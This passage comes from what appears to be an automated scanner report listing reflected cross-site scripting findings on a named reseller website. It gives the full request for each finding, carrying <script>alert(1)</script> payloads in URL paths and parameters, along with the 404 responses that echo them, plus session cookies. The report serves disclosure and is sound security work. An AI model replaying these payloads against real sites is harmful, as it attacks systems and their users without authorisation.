Path:	/detail/19/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89281<script>alert(1)</script>dccfa4d212b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail89281<script>alert(1)</script>dccfa4d212b/19/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89281<script>alert(1)</script>dccfa4d212b/19/ was not found on this server.</p>
...[SNIP]...

2.1561. http://www.resellerbase.com/detail/19/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48348<script>alert(1)</script>ba4d13a228b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1948348<script>alert(1)</script>ba4d13a228b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1948348<script>alert(1)</script>ba4d13a228b/ was not found on this server.</p>
...[SNIP]...

2.1562. http://www.resellerbase.com/detail/19/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a9e99<script>alert(1)</script>c50740cada7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/?a9e99<script>alert(1)</script>c50740cada7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/?a9e99<script>alert(1)</script>c50740cada7=1 was not found on this server.</p>
...[SNIP]...

2.1563. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb60d<script>alert(1)</script>ae834bb1b76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfb60d<script>alert(1)</script>ae834bb1b76/19/dating-central-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfb60d<script>alert(1)</script>ae834bb1b76/19/dating-central-com.html was not found on this server.</p>
...[SNIP]...

2.1564. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8b525<a>b5e824b5021 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/198b525<a>b5e824b5021/dating-central-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/198b525<a>b5e824b5021/dating-central-com.html was not found on this server.</p>
...[SNIP]...

2.1565. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 912cc<script>alert(1)</script>17b03b030fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/912cc<script>alert(1)</script>17b03b030fa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/912cc<script>alert(1)</script>17b03b030fa was not found on this server.</p>
...[SNIP]...

2.1566. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b39f<script>alert(1)</script>d8457e730b2cb1267 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail3b39f<script>alert(1)</script>d8457e730b2cb1267/19/rating.php?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3b39f<script>alert(1)</script>d8457e730b2cb1267/19/rating.php?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1567. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e7ef<script>alert(1)</script>86151132e22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e7ef<script>alert(1)</script>86151132e22/19/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e7ef<script>alert(1)</script>86151132e22/19/rating.php was not found on this server.</p>
...[SNIP]...

2.1568. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ae51<script>alert(1)</script>beb0eb2d8c915b014 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/199ae51<script>alert(1)</script>beb0eb2d8c915b014/rating.php?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/199ae51<script>alert(1)</script>beb0eb2d8c915b014/rating.php?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1569. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6004c<script>alert(1)</script>57e9edf5313 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/196004c<script>alert(1)</script>57e9edf5313/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/196004c<script>alert(1)</script>57e9edf5313/rating.php was not found on this server.</p>
...[SNIP]...

2.1570. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0eec<script>alert(1)</script>254612363c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/rating.phpb0eec<script>alert(1)</script>254612363c4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.phpb0eec<script>alert(1)</script>254612363c4 was not found on this server.</p>
...[SNIP]...

2.1571. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73988<script>alert(1)</script>7fbfdac7cb74e85c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/19/rating.php73988<script>alert(1)</script>7fbfdac7cb74e85c4?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php73988<script>alert(1)</script>7fbfdac7cb74e85c4?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1572. http://www.resellerbase.com/detail/19/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b10c2<script>alert(1)</script>26e5839c1b84060eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/19/rating.php/b10c2<script>alert(1)</script>26e5839c1b84060eb?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php/b10c2<script>alert(1)</script>26e5839c1b84060eb?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1573. http://www.resellerbase.com/detail/19/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c594e<script>alert(1)</script>dc56e90bc9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/rating.php?c594e<script>alert(1)</script>dc56e90bc9b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php?c594e<script>alert(1)</script>dc56e90bc9b=1 was not found on this server.</p>
...[SNIP]...

2.1574. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96037<script>alert(1)</script>b3a8b5225fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail96037<script>alert(1)</script>b3a8b5225fa/19/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail96037<script>alert(1)</script>b3a8b5225fa/19/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1575. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66924<script>alert(1)</script>7ed0a01615b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1966924<script>alert(1)</script>7ed0a01615b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1966924<script>alert(1)</script>7ed0a01615b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1576. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b576c<script>alert(1)</script>431900b0fcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/search.phpb576c<script>alert(1)</script>431900b0fcb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.phpb576c<script>alert(1)</script>431900b0fcb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1577. http://www.resellerbase.com/detail/19/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 93def<a>b25b53ff137 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search93def<a>b25b53ff137&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search93def<a>b25b53ff137&opt=2 was not found on this server.</p>
...[SNIP]...

2.1578. http://www.resellerbase.com/detail/19/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6929b<a>d4f7ae0ff24 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...6929b<a>d4f7ae0ff24&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...6929b<a>d4f7ae0ff24&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1579. http://www.resellerbase.com/detail/19/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9182e<script>alert(1)</script>8ac9655e9ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search&opt=2&9182e<script>alert(1)</script>8ac9655e9ab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
